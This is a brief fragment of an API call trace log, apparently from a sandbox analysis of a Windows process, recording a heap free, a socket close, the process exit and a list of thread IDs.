lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.878] closesocket (s=0x314) returned 0 [0221.879] exit (_Code=0) Thread: id = 81 os_tid = 0xf7c Thread: id = 82 os_tid = 0xf80 Thread: id = 83 os_tid = 0xf84 Thread: id = 84 os_tid = 0xf88 Thread: id = 85 os_tid = 0xf8c Thread: id = 86 os_tid = 0xf90 Thread: id = 87 os_tid = 0xf94